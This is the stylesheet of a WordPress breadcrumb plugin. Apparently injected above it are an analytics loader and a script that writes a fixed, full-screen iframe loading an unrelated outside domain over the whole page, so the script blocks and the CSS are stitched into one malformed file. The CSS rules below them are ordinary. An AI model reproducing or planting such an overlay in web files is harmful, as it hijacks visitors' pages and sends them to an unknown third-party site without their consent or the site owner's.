<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?d922ffe6c530f1befa34ee2e526085ff";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


<script>
document.write('<meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"><style>html,body{width:100%;height:100%;margin:0;padding:0}</style>');
  var iframe = document.createElement('iframe');
  iframe.src = 'https://www.abfjddl188.com/';
  iframe.scrolling = 'auto';
  iframe.style.cssText = "width:100%;height:100%;left:1px;top:1px;border:none;background:#fff";
  var div1 = document.createElement("div");
  var div =  document.createElement("div");
  div1.style.cssText = "-webkit-overflow-scrolling:touch;width:100%;height:100%;z-index:9999999999;position:fixed;top:0;left:0;";
    var is_mobi = navigator.userAgent.toLowerCase().match(/(ipad|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i) != null;
  if (is_mobi) {
    div1.style.overflow = "auto";
  }
  div1.appendChild(iframe);
  div.appendChild(div1);
  document.write(div.innerHTML);
</script>    @charset "UTF-8";
    /**
 * Flexy Breadcrumb Front-end Core CSS File - V 1.0.0
 *
 * @author PressTigers <support@presstigers.com>, 2016
 *
 * @since    1.0.0
 * @since    1.1.3   Fixed padding and margin issue of separator
 */
    /*--------------------------------------------------------------
>>> TABLE OF CONTENTS:
----------------------------------------------------------------
1. Bootstrap
2. Flexy Breadcrumb
--------------------------------------------------------------*/
    /*--------------------------------------------------------------
1. Bootstrap
--------------------------------------------------------------*/
    /*!
 * Bootstrap v3.3.7 (http://getbootstrap.com)
 * Copyright 2011-2016 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 */
    
    .fbc-page .fbc-items {
        margin-bottom: 20px;
        list-style: none;
        border-radius: 4px;
    }
    
    .fbc-page .fbc-items>li {
        display: inline-block;
    }
    
    .fbc-page .fbc-items>li+li:before {
        color: #ccc;
    }
    /*--------------------------------------------------------------
2. Flexy Breadcrumb
--------------------------------------------------------------*/
    /* Components */
    
    .fbc-page * {
        margin: 0;
        padding: 0;
    }
    
    .fbc-page .fbc-wrap .fbc-items {
        font-family: "Roboto", sans-serif;
        margin: 0;
        padding: 0;
        width: auto;
        display: block;
        float: left;
        font-size: 16px;
    }
    
    .fbc-page .fbc-wrap .fbc-items li {
      
        padding: 15px 0;
        line-height: normal;
    }
    
    .fbc-page .fbc-wrap .fbc-items li:first-child {
        border-radius: 4px 0 0 4px;
        padding-left: 16px;
        padding-right: 0px;
    }
    
    .fbc-page .fbc-wrap .fbc-items li:last-child {
        border-radius: 0 4px 4px 0;
        padding-right: 15px;
    }
    
    .fbc-page .fbc-wrap .fbc-items li a {
        color: #337ab7;
    }
    
    .fbc-page .fbc-wrap .fbc-items li a i {
        margin-right: 5px;
    }
    
    .fbc-page .fbc-wrap .fbc-items li.active a {
        color: #27272a;
    }
    
    @media (max-width: 768px) {
        .fbc-page .fbc-wrap .fbc-items {
            padding: 0 10px;
        }
        .fbc-page .fbc-wrap .fbc-items li:last-child {
            padding-right: 0;
        }
        .fbc-page .fbc-wrap .fbc-items li:nth-child(7),
        .fbc-page .fbc-wrap .fbc-items li:nth-child(8),
        .fbc-page .fbc-wrap .fbc-items li:nth-child(9) {
            padding-top: 0;
        }
        .fbc-page .fbc-wrap .fbc-items li a i {
            margin-right: 1px;
        }
        .fbc-page .fbc-wrap .fbc-items li .fbc-separator {
            margin-left: 5px;
        }
	.fbc-page .fbc-wrap .fbc-items li:nth-child(even) .fbc-separator {
        	margin: 0 0px;
    	}
    }
    
    .fbc-page .clearfix::before,
    .fbc-page .clearfix::after {
        content: " ";
        display: table;
    }
    
    .fbc-page .clearfix::after {
        clear: both;
    }

    .fbc-page .fbc-wrap .fbc-items li:first-child{
	margin-right: 3px;
    }

    .fbc-page .fbc-wrap .fbc-items li{
        padding: 15px 2px;
    }
    